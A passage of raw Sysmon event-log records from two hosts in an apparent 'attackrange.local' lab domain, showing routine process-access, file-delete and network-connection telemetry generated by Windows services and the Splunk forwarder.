16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060757Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060756Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060755Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060754Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060753Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060752Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060751Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060750Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060749Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060748Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060747Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060746Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060745Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060744Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060743Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.350{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=240440B304D8FF51A570A924E20CF058,SHA256=F2AA9E08BB48508BE54DCB4A07C4039BEAFB82854C626DBC9B8D1F37BFE03452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245391Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:12.812{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA328EF3D1DE70C21173C1412A51C560,SHA256=F96C6F2D982D7B0578A002124A2EB4A81C44AA757CD42A6A64E7E20B9513AFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060776Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:13.726{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58A1019F4EF1A409940D1E278183823F,SHA256=2837BA59184D243B353EF3E09DDE6751838DB6B8D546C1D468F9114DF35CAC9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060775Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:10.960{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54762-false10.0.1.12-8000- 23542300x8000000000000000245392Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:13.828{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD2D6B727B6D6F6DDBBA7CAF21CB28E3,SHA256=401F7400464BBEF345F9131248AE2DA494D50AE937A799AE9F578A46471D8712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245396Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:14.828{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4569EA5582CBE73F5A6ECE52BAC30C3D,SHA256=6F585244168DD8BE6DE87E105DCDA341B71734C10198433CDBDEC71CBA79D6E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245395Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:13.461{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64750-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245394Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:14.078{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C569F6F2E44871BF80C69FE94F0FE0F0,SHA256=FFB07315094A2EAB7381A2E6F488ABAD7AB318CCF46E15A8A661A16688A21856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245393Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:14.078{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F82B95994E12E8472F6B978804928A4,SHA256=9EE8FC6D02894118842DB505029BE2B76EE08E41F9BC81FC986A7917BCF87669,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060777Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:15.101{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C8C00BCD93A28DBDEE2235A98D50ABF,SHA256=00A63C77C02D55C92AF9D30BA3717FC5D75B736B6DCDF52D7D3AC53B9FAB829E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245397Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:15.829{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=456E0EE54BC3F03685384328D71CCD95,SHA256=D28F4EA28562044CE9C7650B39796A8DB1808C155A0894F3332A5CB07DB815DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060778Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:16.507{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3156036EA2E643241A19EB8ED38125B8,SHA256=1BC3221E858BAA89162FDCA64BC687FAC59EE36ED86143B059E5046B007A7E49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245398Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:16.842{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80B166D7664C1FAF20CC78E05C3D0046,SHA256=B8D93C778D2C95E2AE05DD0FAA7D4F500BC72EFAC9E1B426AAD840CF9D9E109A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060779Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:17.867{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB369B06E19706482504C9BAFE2EF15B,SHA256=A5774052C23CCF1CB3227372652547117732DE65AE5D679614C974630A84259D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245399Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:17.843{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF61BD2505EC497E480513E33A6757F1,SHA256=9AE06A11FDA4BE6B5261DCCDF8DEB00487A7339560453965331EE3288C47BF6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060789Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:16.084{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54763-false10.0.1.12-8000- 10341000x80000000000000001060788Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5166-6063-1201-00000000AF01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060787Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060786Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060785Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060784Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060783Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-5166-6063-1201-00000000AF01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060782Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5166-6063-1201-00000000AF01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 